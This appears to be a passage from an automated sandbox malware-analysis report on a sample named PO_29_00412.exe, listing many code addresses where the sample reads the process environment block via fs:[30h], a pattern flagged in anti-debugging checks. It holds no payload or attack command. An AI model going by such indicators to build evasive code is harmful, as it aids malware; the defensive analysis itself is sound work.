          Source: C:\Users\user\Desktop\PO_29_00412.exeCode function: 1_2_00B34015 mov eax, dword ptr fs:[00000030h]1_2_00B34015
          Source: C:\Users\user\Desktop\PO_29_00412.exeCode function: 1_2_00B34015 mov eax, dword ptr fs:[00000030h]1_2_00B34015
          Source: C:\Users\user\Desktop\PO_29_00412.exeCode function: 1_2_00AE7016 mov eax, dword ptr fs:[00000030h]1_2_00AE7016
          Source: C:\Users\user\Desktop\PO_29_00412.exeCode function: 1_2_00AE7016 mov eax, dword ptr fs:[00000030h]1_2_00AE7016
          Source: C:\Users\user\Desktop\PO_29_00412.exeCode function: 1_2_00AE7016 mov eax, dword ptr fs:[00000030h]1_2_00AE7016
          Source: C:\Users\user\Desktop\PO_29_00412.exeCode function: 1_2_00B22073 mov eax, dword ptr fs:[00000030h]1_2_00B22073
          Source: C:\Users\user\Desktop\PO_29_00412.exeCode function: 1_2_00B31074 mov eax, dword ptr fs:[00000030h]1_2_00B31074
          Source: C:\Users\user\Desktop\PO_29_00412.exeCode function: 1_2_00A80050 mov eax, dword ptr fs:[00000030h]1_2_00A80050
          Source: C:\Users\user\Desktop\PO_29_00412.exeCode function: 1_2_00A80050 mov eax, dword ptr fs:[00000030h]1_2_00A80050
          Source: C:\Users\user\Desktop\PO_29_00412.exeCode function: 1_2_00AE69A6 mov eax, dword ptr fs:[00000030h]1_2_00AE69A6
          Source: C:\Users\user\Desktop\PO_29_00412.exeCode function: 1_2_00A961A0 mov eax, dword ptr fs:[00000030h]1_2_00A961A0
          Source: C:\Users\user\Desktop\PO_29_00412.exeCode function: 1_2_00A961A0 mov eax, dword ptr fs:[00000030h]1_2_00A961A0
          Source: C:\Users\user\Desktop\PO_29_00412.exeCode function: 1_2_00AE51BE mov eax, dword ptr fs:[00000030h]1_2_00AE51BE
          Source: C:\Users\user\Desktop\PO_29_00412.exeCode function: 1_2_00AE51BE mov eax, dword ptr fs:[00000030h]1_2_00AE51BE
          Source: C:\Users\user\Desktop\PO_29_00412.exeCode function: 1_2_00AE51BE mov eax, dword ptr fs:[00000030h]1_2_00AE51BE
          Source: C:\Users\user\Desktop\PO_29_00412.exeCode function: 1_2_00AE51BE mov eax, dword ptr fs:[00000030h]1_2_00AE51BE
          Source: C:\Users\user\Desktop\PO_29_00412.exeCode function: 1_2_00A8C182 mov eax, dword ptr fs:[00000030h]1_2_00A8C182
          Source: C:\Users\user\Desktop\PO_29_00412.exeCode function: 1_2_00A9A185 mov eax, dword ptr fs:[00000030h]1_2_00A9A185
          Source: C:\Users\user\Desktop\PO_29_00412.exeCode function: 1_2_00A92990 mov eax, dword ptr fs:[00000030h]1_2_00A92990
          Source: C:\Users\user\Desktop\PO_29_00412.exeCode function: 1_2_00A6B1E1 mov eax, dword ptr fs:[00000030h]1_2_00A6B1E1
          Source: C:\Users\user\Desktop\PO_29_00412.exeCode function: 1_2_00A6B1E1 mov eax, dword ptr fs:[00000030h]1_2_00A6B1E1
          Source: C:\Users\user\Desktop\PO_29_00412.exeCode function: 1_2_00A6B1E1 mov eax, dword ptr fs:[00000030h]1_2_00A6B1E1
          Source: C:\Users\user\Desktop\PO_29_00412.exeCode function: 1_2_00AF41E8 mov eax, dword ptr fs:[00000030h]1_2_00AF41E8
          Source: C:\Users\user\Desktop\PO_29_00412.exeCode function: 1_2_00A84120 mov eax, dword ptr fs:[00000030h]1_2_00A84120
          Source: C:\Users\user\Desktop\PO_29_00412.exeCode function: 1_2_00A84120 mov eax, dword ptr fs:[00000030h]1_2_00A84120
          Source: C:\Users\user\Desktop\PO_29_00412.exeCode function: 1_2_00A84120 mov eax, dword ptr fs:[00000030h]1_2_00A84120
          Source: C:\Users\user\Desktop\PO_29_00412.exeCode function: 1_2_00A84120 mov eax, dword ptr fs:[00000030h]1_2_00A84120
          Source: C:\Users\user\Desktop\PO_29_00412.exeCode function: 1_2_00A84120 mov ecx, dword ptr fs:[00000030h]1_2_00A84120
          Source: C:\Users\user\Desktop\PO_29_00412.exeCode function: 1_2_00A9513A mov eax, dword ptr fs:[00000030h]1_2_00A9513A
          Source: C:\Users\user\Desktop\PO_29_00412.exeCode function: 1_2_00A9513A mov eax, dword ptr fs:[00000030h]1_2_00A9513A
          Source: C:\Users\user\Desktop\PO_29_00412.exeCode function: 1_2_00A69100 mov eax, dword ptr fs:[00000030h]1_2_00A69100
          Source: C:\Users\user\Desktop\PO_29_00412.exeCode function: 1_2_00A69100 mov eax, dword ptr fs:[00000030h]1_2_00A69100
          Source: C:\Users\user\Desktop\PO_29_00412.exeCode function: 1_2_00A69100 mov eax, dword ptr fs:[00000030h]1_2_00A69100
          Source: C:\Users\user\Desktop\PO_29_00412.exeCode function: 1_2_00A6C962 mov eax, dword ptr fs:[00000030h]1_2_00A6C962
          Source: C:\Users\user\Desktop\PO_29_00412.exeCode function: 1_2_00A6B171 mov eax, dword ptr fs:[00000030h]1_2_00A6B171
          Source: C:\Users\user\Desktop\PO_29_00412.exeCode function: 1_2_00A6B171 mov eax, dword ptr fs:[00000030h]1_2_00A6B171
          Source: C:\Users\user\Desktop\PO_29_00412.exeCode function: 1_2_00A8B944 mov eax, dword ptr fs:[00000030h]1_2_00A8B944
          Source: C:\Users\user\Desktop\PO_29_00412.exeCode function: 1_2_00A8B944 mov eax, dword ptr fs:[00000030h]1_2_00A8B944
          Source: C:\Users\user\Desktop\PO_29_00412.exeCode function: 1_2_00A652A5 mov eax, dword ptr fs:[00000030h]1_2_00A652A5
          Source: C:\Users\user\Desktop\PO_29_00412.exeCode function: 1_2_00A652A5 mov eax, dword ptr fs:[00000030h]1_2_00A652A5
          Source: C:\Users\user\Desktop\PO_29_00412.exeCode function: 1_2_00A652A5 mov eax, dword ptr fs:[00000030h]1_2_00A652A5
          Source: C:\Users\user\Desktop\PO_29_00412.exeCode function: 1_2_00A652A5 mov eax, dword ptr fs:[00000030h]1_2_00A652A5
          Source: C:\Users\user\Desktop\PO_29_00412.exeCode function: 1_2_00A652A5 mov eax, dword ptr fs:[00000030h]1_2_00A652A5
          Source: C:\Users\user\Desktop\PO_29_00412.exeCode function: 1_2_00A7AAB0 mov eax, dword ptr fs:[00000030h]1_2_00A7AAB0
          Source: C:\Users\user\Desktop\PO_29_00412.exeCode function: 1_2_00A7AAB0 mov eax, dword ptr fs:[00000030h]1_2_00A7AAB0
          Source: C:\Users\user\Desktop\PO_29_00412.exeCode function: 1_2_00A9FAB0 mov eax, dword ptr fs:[00000030h]1_2_00A9FAB0
          Source: C:\Users\user\Desktop\PO_29_00412.exeCode function: 1_2_00A9D294 mov eax, dword ptr fs:[00000030h]1_2_00A9D294
          Source: C:\Users\user\Desktop\PO_29_00412.exeCode function: 1_2_00A9D294 mov eax, dword ptr fs:[00000030h]1_2_00A9D294
          Source: C:\Users\user\Desktop\PO_29_00412.exeCode function: 1_2_00A92AE4 mov eax, dword ptr fs:[00000030h]1_2_00A92AE4
          Source: C:\Users\user\Desktop\PO_29_00412.exeCode function: 1_2_00A92ACB mov eax, dword ptr fs:[00000030h]1_2_00A92ACB
          Source: C:\Users\user\Desktop\PO_29_00412.exeCode function: 1_2_00AA4A2C mov eax, dword ptr fs:[00000030h]1_2_00AA4A2C
          Source: C:\Users\user\Desktop\PO_29_00412.exeCode function: 1_2_00AA4A2C mov eax, dword ptr fs:[00000030h]1_2_00AA4A2C
          Source: C:\Users\user\Desktop\PO_29_00412.exeCode function: 1_2_00B2AA16 mov eax, dword ptr fs:[00000030h]1_2_00B2AA16
          Source: C:\Users\user\Desktop\PO_29_00412.exeCode function: 1_2_00B2AA16 mov eax, dword ptr fs:[00000030h]1_2_00B2AA16
          Source: C:\Users\user\Desktop\PO_29_00412.exeCode function: 1_2_00A78A0A mov eax, dword ptr fs:[00000030h]1_2_00A78A0A
          Source: C:\Users\user\Desktop\PO_29_00412.exeCode function: 1_2_00A6AA16 mov eax, dword ptr fs:[00000030h]1_2_00A6AA16
          Source: C:\Users\user\Desktop\PO_29_00412.exeCode function: 1_2_00A6AA16 mov eax, dword ptr fs:[00000030h]1_2_00A6AA16
          Source: C:\Users\user\Desktop\PO_29_00412.exeCode function: 1_2_00A83A1C mov eax, dword ptr fs:[00000030h]1_2_00A83A1C
          Source: C:\Users\user\Desktop\PO_29_00412.exeCode function: 1_2_00A65210 mov eax, dword ptr fs:[00000030h]1_2_00A65210
          Source: C:\Users\user\Desktop\PO_29_00412.exeCode function: 1_2_00A65210 mov ecx, dword ptr fs:[00000030h]1_2_00A65210
          Source: C:\Users\user\Desktop\PO_29_00412.exeCode function: 1_2_00A65210 mov eax, dword ptr fs:[00000030h]1_2_00A65210
          Source: C:\Users\user\Desktop\PO_29_00412.exeCode function: 1_2_00A65210 mov eax, dword ptr fs:[00000030h]1_2_00A65210
          Source: C:\Users\user\Desktop\PO_29_00412.exeCode function: 1_2_00AA927A mov eax, dword ptr fs:[00000030h]1_2_00AA927A
          Source: C:\Users\user\Desktop\PO_29_00412.exeCode function: 1_2_00B1B260 mov eax, dword ptr fs:[00000030h]1_2_00B1B260
          Source: C:\Users\user\Desktop\PO_29_00412.exeCode function: 1_2_00B1B260 mov eax, dword ptr fs:[00000030h]1_2_00B1B260
          Source: C:\Users\user\Desktop\PO_29_00412.exeCode function: 1_2_00B38A62 mov eax, dword ptr fs:[00000030h]1_2_00B38A62
          Source: C:\Users\user\Desktop\PO_29_00412.exeCode function: 1_2_00A69240 mov eax, dword ptr fs:[00000030h]1_2_00A69240
          Source: C:\Users\user\Desktop\PO_29_00412.exeCode function: 1_2_00A69240 mov eax, dword ptr fs:[00000030h]1_2_00A69240
          Source: C:\Users\user\Desktop\PO_29_00412.exeCode function: 1_2_00A69240 mov eax, dword ptr fs:[00000030h]1_2_00A69240
          Source: C:\Users\user\Desktop\PO_29_00412.exeCode function: 1_2_00A69240 mov eax, dword ptr fs:[00000030h]1_2_00A69240
          Source: C:\Users\user\Desktop\PO_29_00412.exeCode function: 1_2_00B2EA55 mov eax, dword ptr fs:[00000030h]1_2_00B2EA55
          Source: C:\Users\user\Desktop\PO_29_00412.exeCode function: 1_2_00AF4257 mov eax, dword ptr fs:[00000030h]1_2_00AF4257
          Source: C:\Users\user\Desktop\PO_29_00412.exeCode function: 1_2_00A94BAD mov eax, dword ptr fs:[00000030h]1_2_00A94BAD
          Source: C:\Users\user\Desktop\PO_29_00412.exeCode function: 1_2_00A94BAD mov eax, dword ptr fs:[00000030h]1_2_00A94BAD
          Source: C:\Users\user\Desktop\PO_29_00412.exeCode function: 1_2_00A94BAD mov eax, dword ptr fs:[00000030h]1_2_00A94BAD
          Source: C:\Users\user\Desktop\PO_29_00412.exeCode function: 1_2_00B35BA5 mov eax, dword ptr fs:[00000030h]1_2_00B35BA5
          Source: C:\Users\user\Desktop\PO_29_00412.exeCode function: 1_2_00A71B8F mov eax, dword ptr fs:[00000030h]1_2_00A71B8F
          Source: C:\Users\user\Desktop\PO_29_00412.exeCode function: 1_2_00A71B8F mov eax, dword ptr fs:[00000030h]1_2_00A71B8F
          Source: C:\Users\user\Desktop\PO_29_00412.exeCode function: 1_2_00B1D380 mov ecx, dword ptr fs:[00000030h]1_2_00B1D380
          Source: C:\Users\user\Desktop\PO_29_00412.exeCode function: 1_2_00B2138A mov eax, dword ptr fs:[00000030h]1_2_00B2138A
          Source: C:\Users\user\Desktop\PO_29_00412.exeCode function: 1_2_00A9B390 mov eax, dword ptr fs:[00000030h]1_2_00A9B390
          Source: C:\Users\user\Desktop\PO_29_00412.exeCode function: 1_2_00A92397 mov eax, dword ptr fs:[00000030h]1_2_00A92397
          Source: C:\Users\user\Desktop\PO_29_00412.exeCode function: 1_2_00A8DBE9 mov eax, dword ptr fs:[00000030h]1_2_00A8DBE9
          Source: C:\Users\user\Desktop\PO_29_00412.exeCode function: 1_2_00A903E2 mov eax, dword ptr fs:[00000030h]1_2_00A903E2
          Source: C:\Users\user\Desktop\PO_29_00412.exeCode function: 1_2_00A903E2 mov eax, dword ptr fs:[00000030h]1_2_00A903E2
          Source: C:\Users\user\Desktop\PO_29_00412.exeCode function: 1_2_00A903E2 mov eax, dword ptr fs:[00000030h]1_2_00A903E2
          Source: C:\Users\user\Desktop\PO_29_00412.exeCode function: 1_2_00A903E2 mov eax, dword ptr fs:[00000030h]1_2_00A903E2
          Source: C:\Users\user\Desktop\PO_29_00412.exeCode function: 1_2_00A903E2 mov eax, dword ptr fs:[00000030h]1_2_00A903E2
          Source: C:\Users\user\Desktop\PO_29_00412.exeCode function: 1_2_00A903E2 mov eax, dword ptr fs:[00000030h]1_2_00A903E2
          Source: C:\Users\user\Desktop\PO_29_00412.exeCode function: 1_2_00AE53CA mov eax, dword ptr fs:[00000030h]1_2_00AE53CA
          Source: C:\Users\user\Desktop\PO_29_00412.exeCode function: 1_2_00AE53CA mov eax, dword ptr fs:[00000030h]1_2_00AE53CA
          Source: C:\Users\user\Desktop\PO_29_00412.exeCode function: 1_2_00B2131B mov eax, dword ptr fs:[00000030h]1_2_00B2131B
          Source: C:\Users\user\Desktop\PO_29_00412.exeCode function: 1_2_00A6DB60 mov ecx, dword ptr fs:[00000030h]1_2_00A6DB60
          Source: C:\Users\user\Desktop\PO_29_00412.exeCode function: 1_2_00A93B7A mov eax, dword ptr fs:[00000030h]1_2_00A93B7A
          Source: C:\Users\user\Desktop\PO_29_00412.exeCode function: 1_2_00A93B7A mov eax, dword ptr fs:[00000030h]1_2_00A93B7A
          Source: C:\Users\user\Desktop\PO_29_00412.exeCode function: 1_2_00A6DB40 mov eax, dword ptr fs:[00000030h]1_2_00A6DB40
          Source: C:\Users\user\Desktop\PO_29_00412.exeCode function: 1_2_00B38B58 mov eax, dword ptr fs:[00000030h]1_2_00B38B58
          Source: C:\Users\user\Desktop\PO_29_00412.exeCode function: 1_2_00A6F358 mov eax, dword ptr fs:[00000030h]1_2_00A6F358
          Source: C:\Users\user\Desktop\PO_29_00412.exeCode function: 1_2_00A7849B mov eax, dword ptr fs:[00000030h]1_2_00A7849B
          Source: C:\Users\user\Desktop\PO_29_00412.exeCode function: 1_2_00B214FB mov eax, dword ptr fs:[00000030h]1_2_00B214FB
          Source: C:\Users\user\Desktop\PO_29_00412.exeCode function: 1_2_00AE6CF0 mov eax, dword ptr fs:[00000030h]1_2_00AE6CF0
          Source: C:\Users\user\Desktop\PO_29_00412.exeCode function: 1_2_00AE6CF0 mov eax, dword ptr fs:[00000030h]1_2_00AE6CF0
          Source: C:\Users\user\Desktop\PO_29_00412.exeCode function: 1_2_00AE6CF0 mov eax, dword ptr fs:[00000030h]1_2_00AE6CF0
          Source: C:\Users\user\Desktop\PO_29_00412.exeCode function: 1_2_00B38CD6 mov eax, dword ptr fs:[00000030h]1_2_00B38CD6
          Source: C:\Users\user\Desktop\PO_29_00412.exeCode function: 1_2_00A9BC2C mov eax, dword ptr fs:[00000030h]1_2_00A9BC2C
          Source: C:\Users\user\Desktop\PO_29_00412.exeCode function: 1_2_00AE6C0A mov eax, dword ptr fs:[00000030h]1_2_00AE6C0A
          Source: C:\Users\user\Desktop\PO_29_00412.exeCode function: 1_2_00AE6C0A mov eax, dword ptr fs:[00000030h]1_2_00AE6C0A
          Source: C:\Users\user\Desktop\PO_29_00412.exeCode function: 1_2_00AE6C0A mov eax, dword ptr fs:[00000030h]1_2_00AE6C0A
          Source: C:\Users\user\Desktop\PO_29_00412.exeCode function: 1_2_00AE6C0A mov eax, dword ptr fs:[00000030h]1_2_00AE6C0A
          Source: C:\Users\user\Desktop\PO_29_00412.exeCode function: 1_2_00B21C06 mov eax, dword ptr fs:[00000030h]1_2_00B21C06
          Source: C:\Users\user\Desktop\PO_29_00412.exeCode function: 1_2_00B21C06 mov eax, dword ptr fs:[00000030h]1_2_00B21C06
          Source: C:\Users\user\Desktop\PO_29_00412.exeCode function: 1_2_00B21C06 mov eax, dword ptr fs:[00000030h]1_2_00B21C06
          Source: C:\Users\user\Desktop\PO_29_00412.exeCode function: 1_2_00B21C06 mov eax, dword ptr fs:[00000030h]1_2_00B21C06
          Source: C:\Users\user\Desktop\PO_29_00412.exeCode function: 1_2_00B21C06 mov eax, dword ptr fs:[00000030h]1_2_00B21C06
          Source: C:\Users\user\Desktop\PO_29_00412.exeCode function: 1_2_00B21C06 mov eax, dword ptr fs:[00000030h]1_2_00B21C06
          Source: C:\Users\user\Desktop\PO_29_00412.exeCode function: 1_2_00B21C06 mov eax, dword ptr fs:[00000030h]1_2_00B21C06
          Source: C:\Users\user\Desktop\PO_29_00412.exeCode function: 1_2_00B21C06 mov eax, dword ptr fs:[00000030h]1_2_00B21C06
          Source: C:\Users\user\Desktop\PO_29_00412.exeCode function: 1_2_00B21C06 mov eax, dword ptr fs:[00000030h]1_2_00B21C06
          Source: C:\Users\user\Desktop\PO_29_00412.exeCode function: 1_2_00B21C06 mov eax, dword ptr fs:[00000030h]1_2_00B21C06
          Source: C:\Users\user\Desktop\PO_29_00412.exeCode function: 1_2_00B21C06 mov eax, dword ptr fs:[00000030h]1_2_00B21C06
          Source: C:\Users\user\Desktop\PO_29_00412.exeCode function: 1_2_00B21C06 mov eax, dword ptr fs:[00000030h]1_2_00B21C06
          Source: C:\Users\user\Desktop\PO_29_00412.exeCode function: 1_2_00B21C06 mov eax, dword ptr fs:[00000030h]1_2_00B21C06
          Source: C:\Users\user\Desktop\PO_29_00412.exeCode function: 1_2_00B21C06 mov eax, dword ptr fs:[00000030h]1_2_00B21C06
          Source: C:\Users\user\Desktop\PO_29_00412.exeCode function: 1_2_00B3740D mov eax, dword ptr fs:[00000030h]1_2_00B3740D
          Source: C:\Users\user\Desktop\PO_29_00412.exeCode function: 1_2_00B3740D mov eax, dword ptr fs:[00000030h]1_2_00B3740D
          Source: C:\Users\user\Desktop\PO_29_00412.exeCode function: 1_2_00B3740D mov eax, dword ptr fs:[00000030h]1_2_00B3740D
          Source: C:\Users\user\Desktop\PO_29_00412.exeCode function: 1_2_00A8746D mov eax, dword ptr fs:[00000030h]1_2_00A8746D
          Source: C:\Users\user\Desktop\PO_29_00412.exeCode function: 1_2_00A9A44B mov eax, dword ptr fs:[00000030h]1_2_00A9A44B
          Source: C:\Users\user\Desktop\PO_29_00412.exeCode function: 1_2_00AFC450 mov eax, dword ptr fs:[00000030h]1_2_00AFC450
          Source: C:\Users\user\Desktop\PO_29_00412.exeCode function: 1_2_00AFC450 mov eax, dword ptr fs:[00000030h]1_2_00AFC450
          Source: C:\Users\user\Desktop\PO_29_00412.exeCode function: 1_2_00A935A1 mov eax, dword ptr fs:[00000030h]1_2_00A935A1
          Source: C:\Users\user\Desktop\PO_29_00412.exeCode function: 1_2_00A91DB5 mov eax, dword ptr fs:[00000030h]1_2_00A91DB5
          Source: C:\Users\user\Desktop\PO_29_00412.exeCode function: 1_2_00A91DB5 mov eax, dword ptr fs:[00000030h]1_2_00A91DB5
          Source: C:\Users\user\Desktop\PO_29_00412.exeCode function: 1_2_00A91DB5 mov eax, dword ptr fs:[00000030h]1_2_00A91DB5
          Source: C:\Users\user\Desktop\PO_29_00412.exeCode function: 1_2_00B305AC mov eax, dword ptr fs:[00000030h]1_2_00B305AC
          Source: C:\Users\user\Desktop\PO_29_00412.exeCode function: 1_2_00B305AC mov eax, dword ptr fs:[00000030h]1_2_00B305AC
          Source: C:\Users\user\Desktop\PO_29_00412.exeCode function: 1_2_00A92581 mov eax, dword ptr fs:[00000030h]1_2_00A92581
          Source: C:\Users\user\Desktop\PO_29_00412.exeCode function: 1_2_00A92581 mov eax, dword ptr fs:[00000030h]1_2_00A92581
          Source: C:\Users\user\Desktop\PO_29_00412.exeCode function: 1_2_00A92581 mov eax, dword ptr fs:[00000030h]1_2_00A92581
          Source: C:\Users\user\Desktop\PO_29_00412.exeCode function: 1_2_00A92581 mov eax, dword ptr fs:[00000030h]1_2_00A92581
          Source: C:\Users\user\Desktop\PO_29_00412.exeCode function: 1_2_00A62D8A mov eax, dword ptr fs:[00000030h]1_2_00A62D8A
          Source: C:\Users\user\Desktop\PO_29_00412.exeCode function: 1_2_00A62D8A mov eax, dword ptr fs:[00000030h]1_2_00A62D8A
          Source: C:\Users\user\Desktop\PO_29_00412.exeCode function: 1_2_00A62D8A mov eax, dword ptr fs:[00000030h]1_2_00A62D8A
          Source: C:\Users\user\Desktop\PO_29_00412.exeCode function: 1_2_00A62D8A mov eax, dword ptr fs:[00000030h]1_2_00A62D8A
          Source: C:\Users\user\Desktop\PO_29_00412.exeCode function: 1_2_00A62D8A mov eax, dword ptr fs:[00000030h]1_2_00A62D8A
          Source: C:\Users\user\Desktop\PO_29_00412.exeCode function: 1_2_00A9FD9B mov eax, dword ptr fs:[00000030h]1_2_00A9FD9B
          Source: C:\Users\user\Desktop\PO_29_00412.exeCode function: 1_2_00A9FD9B mov eax, dword ptr fs:[00000030h]1_2_00A9FD9B
          Source: C:\Users\user\Desktop\PO_29_00412.exeCode function: 1_2_00B18DF1 mov eax, dword ptr fs:[00000030h]1_2_00B18DF1
          Source: C:\Users\user\Desktop\PO_29_00412.exeCode function: 1_2_00A7D5E0 mov eax, dword ptr fs:[00000030h]1_2_00A7D5E0
          Source: C:\Users\user\Desktop\PO_29_00412.exeCode function: 1_2_00A7D5E0 mov eax, dword ptr fs:[00000030h]1_2_00A7D5E0
          Source: C:\Users\user\Desktop\PO_29_00412.exeCode function: 1_2_00B2FDE2 mov eax, dword ptr fs:[00000030h]1_2_00B2FDE2
          Source: C:\Users\user\Desktop\PO_29_00412.exeCode function: 1_2_00B2FDE2 mov eax, dword ptr fs:[00000030h]1_2_00B2FDE2
          Source: C:\Users\user\Desktop\PO_29_00412.exeCode function: 1_2_00B2FDE2 mov eax, dword ptr fs:[00000030h]1_2_00B2FDE2
          Source: C:\Users\user\Desktop\PO_29_00412.exeCode function: 1_2_00B2FDE2 mov eax, dword ptr fs:[00000030h]1_2_00B2FDE2
          Source: C:\Users\user\Desktop\PO_29_00412.exeCode function: 1_2_00AE6DC9 mov eax, dword ptr fs:[00000030h]1_2_00AE6DC9
          Source: C:\Users\user\Desktop\PO_29_00412.exeCode function: 1_2_00AE6DC9 mov eax, dword ptr fs:[00000030h]1_2_00AE6DC9
          Source: C:\Users\user\Desktop\PO_29_00412.exeCode function: 1_2_00AE6DC9 mov eax, dword ptr fs:[00000030h]1_2_00AE6DC9
          Source: C:\Users\user\Desktop\PO_29_00412.exeCode function: 1_2_00AE6DC9 mov ecx, dword ptr fs:[00000030h]1_2_00AE6DC9
          Source: C:\Users\user\Desktop\PO_29_00412.exeCode function: 1_2_00AE6DC9 mov eax, dword ptr fs:[00000030h]1_2_00AE6DC9
          Source: C:\Users\user\Desktop\PO_29_00412.exeCode function: 1_2_00AE6DC9 mov eax, dword ptr fs:[00000030h]1_2_00AE6DC9
          Source: C:\Users\user\Desktop\PO_29_00412.exeCode function: 1_2_00B38D34 mov eax, dword ptr fs:[00000030h]1_2_00B38D34
          Source: C:\Users\user\Desktop\PO_29_00412.exeCode function: 1_2_00B2E539 mov eax, dword ptr fs:[00000030h]1_2_00B2E539
          Source: C:\Users\user\Desktop\PO_29_00412.exeCode function: 1_2_00A94D3B mov eax, dword ptr fs:[00000030h]1_2_00A94D3B
          Source: C:\Users\user\Desktop\PO_29_00412.exeCode function: 1_2_00A94D3B mov eax, dword ptr fs:[00000030h]1_2_00A94D3B
          Source: C:\Users\user\Desktop\PO_29_00412.exeCode function: 1_2_00A94D3B mov eax, dword ptr fs:[00000030h]1_2_00A94D3B
          Source: C:\Users\user\Desktop\PO_29_00412.exeCode function: 1_2_00A73D34 mov eax, dword ptr fs:[00000030h]1_2_00A73D34
          Source: C:\Users\user\Desktop\PO_29_00412.exeCode function: 1_2_00A73D34 mov eax, dword ptr fs:[00000030h]1_2_00A73D34
          Source: C:\Users\user\Desktop\PO_29_00412.exeCode function: 1_2_00A73D34 mov eax, dword ptr fs:[00000030h]1_2_00A73D34
          Source: C:\Users\user\Desktop\PO_29_00412.exeCode function: 1_2_00A73D34 mov eax, dword ptr fs:[00000030h]1_2_00A73D34
          Source: C:\Users\user\Desktop\PO_29_00412.exeCode function: 1_2_00A73D34 mov eax, dword ptr fs:[00000030h]1_2_00A73D34
          Source: C:\Users\user\Desktop\PO_29_00412.exeCode function: 1_2_00A73D34 mov eax, dword ptr fs:[00000030h]1_2_00A73D34
          Source: C:\Users\user\Desktop\PO_29_00412.exeCode function: 1_2_00A73D34 mov eax, dword ptr fs:[00000030h]1_2_00A73D34
          Source: C:\Users\user\Desktop\PO_29_00412.exeCode function: 1_2_00A73D34 mov eax, dword ptr fs:[00000030h]1_2_00A73D34
          Source: C:\Users\user\Desktop\PO_29_00412.exeCode function: 1_2_00A73D34 mov eax, dword ptr fs:[00000030h]1_2_00A73D34
          Source: C:\Users\user\Desktop\PO_29_00412.exeCode function: 1_2_00A73D34 mov eax, dword ptr fs:[00000030h]1_2_00A73D34
          Source: C:\Users\user\Desktop\PO_29_00412.exeCode function: 1_2_00A73D34 mov eax, dword ptr fs:[00000030h]1_2_00A73D34
          Source: C:\Users\user\Desktop\PO_29_00412.exeCode function: 1_2_00A73D34 mov eax, dword ptr fs:[00000030h]1_2_00A73D34
          Source: C:\Users\user\Desktop\PO_29_00412.exeCode function: 1_2_00A73D34 mov eax, dword ptr fs:[00000030h]1_2_00A73D34
          Source: C:\Users\user\Desktop\PO_29_00412.exeCode function: 1_2_00A6AD30 mov eax, dword ptr fs:[00000030h]1_2_00A6AD30
          Source: C:\Users\user\Desktop\PO_29_00412.exeCode function: 1_2_00AEA537 mov eax, dword ptr fs:[00000030h]1_2_00AEA537
          Source: C:\Users\user\Desktop\PO_29_00412.exeCode function: 1_2_00A8C577 mov eax, dword ptr fs:[00000030h]1_2_00A8C577
          Source: C:\Users\user\Desktop\PO_29_00412.exeCode function: 1_2_00A8C577 mov eax, dword ptr fs:[00000030h]1_2_00A8C577
          Source: C:\Users\user\Desktop\PO_29_00412.exeCode function: 1_2_00AA3D43 mov eax, dword ptr fs:[00000030h]1_2_00AA3D43
          Source: C:\Users\user\Desktop\PO_29_00412.exeCode function: 1_2_00AE3540 mov eax, dword ptr fs:[00000030h]1_2_00AE3540
          Source: C:\Users\user\Desktop\PO_29_00412.exeCode function: 1_2_00A87D50 mov eax, dword ptr fs:[00000030h]1_2_00A87D50
          Source: C:\Users\user\Desktop\PO_29_00412.exeCode function: 1_2_00AE46A7 mov eax, dword ptr fs:[00000030h]1_2_00AE46A7
          Source: C:\Users\user\Desktop\PO_29_00412.exeCode function: 1_2_00B30EA5 mov eax, dword ptr fs:[00000030h]1_2_00B30EA5
          Source: C:\Users\user\Desktop\PO_29_00412.exeCode function: 1_2_00B30EA5 mov eax, dword ptr fs:[00000030h]1_2_00B30EA5
          Source: C:\Users\user\Desktop\PO_29_00412.exeCode function: 1_2_00B30EA5 mov eax, dword ptr fs:[00000030h]1_2_00B30EA5
          Source: C:\Users\user\Desktop\PO_29_00412.exeCode function: 1_2_00AFFE87 mov eax, dword ptr fs:[00000030h]1_2_00AFFE87
          Source: C:\Users\user\Desktop\PO_29_00412.exeCode function: 1_2_00A776E2 mov eax, dword ptr fs:[00000030h]1_2_00A776E2
          Source: C:\Users\user\Desktop\PO_29_00412.exeCode function: 1_2_00A916E0 mov ecx, dword ptr fs:[00000030h]1_2_00A916E0
          Source: C:\Users\user\Desktop\PO_29_00412.exeCode function: 1_2_00B38ED6 mov eax, dword ptr fs:[00000030h]1_2_00B38ED6
          Source: C:\Users\user\Desktop\PO_29_00412.exeCode function: 1_2_00A936CC mov eax, dword ptr fs:[00000030h]1_2_00A936CC
          Source: C:\Users\user\Desktop\PO_29_00412.exeCode function: 1_2_00AA8EC7 mov eax, dword ptr fs:[00000030h]1_2_00AA8EC7
          Source: C:\Users\user\Desktop\PO_29_00412.exeCode function: 1_2_00B1FEC0 mov eax, dword ptr fs:[00000030h]1_2_00B1FEC0
          Source: C:\Users\user\Desktop\PO_29_00412.exeCode function: 1_2_00A6E620 mov eax, dword ptr fs:[00000030h]1_2_00A6E620
          Source: C:\Users\user\Desktop\PO_29_00412.exeCode function: 1_2_00B1FE3F mov eax, dword ptr fs:[00000030h]1_2_00B1FE3F
          Source: C:\Users\user\Desktop\PO_29_00412.exeCode function: 1_2_00A6C600 mov eax, dword ptr fs:[00000030h]1_2_00A6C600
          Source: C:\Users\user\Desktop\PO_29_00412.exeCode function: 1_2_00A6C600 mov eax, dword ptr fs:[00000030h]1_2_00A6C600
          Source: C:\Users\user\Desktop\PO_29_00412.exeCode function: 1_2_00A6C600 mov eax, dword ptr fs:[00000030h]1_2_00A6C600
          Source: C:\Users\user\Desktop\PO_29_00412.exeCode function: 1_2_00A98E00 mov eax, dword ptr fs:[00000030h]1_2_00A98E00
          Source: C:\Users\user\Desktop\PO_29_00412.exeCode function: 1_2_00A9A61C mov eax, dword ptr fs:[00000030h]1_2_00A9A61C
          Source: C:\Users\user\Desktop\PO_29_00412.exeCode function: 1_2_00A9A61C mov eax, dword ptr fs:[00000030h]1_2_00A9A61C
          Source: C:\Users\user\Desktop\PO_29_00412.exeCode function: 1_2_00B21608 mov eax, dword ptr fs:[00000030h]1_2_00B21608
          Source: C:\Users\user\Desktop\PO_29_00412.exeCode function: 1_2_00A7766D mov eax, dword ptr fs:[00000030h]1_2_00A7766D
          Source: C:\Users\user\Desktop\PO_29_00412.exeCode function: 1_2_00A8AE73 mov eax, dword ptr fs:[00000030h]1_2_00A8AE73
          Source: C:\Users\user\Desktop\PO_29_00412.exeCode function: 1_2_00A8AE73 mov eax, dword ptr fs:[00000030h]1_2_00A8AE73
          Source: C:\Users\user\Desktop\PO_29_00412.exeCode function: 1_2_00A8AE73 mov eax, dword ptr fs:[00000030h]1_2_00A8AE73
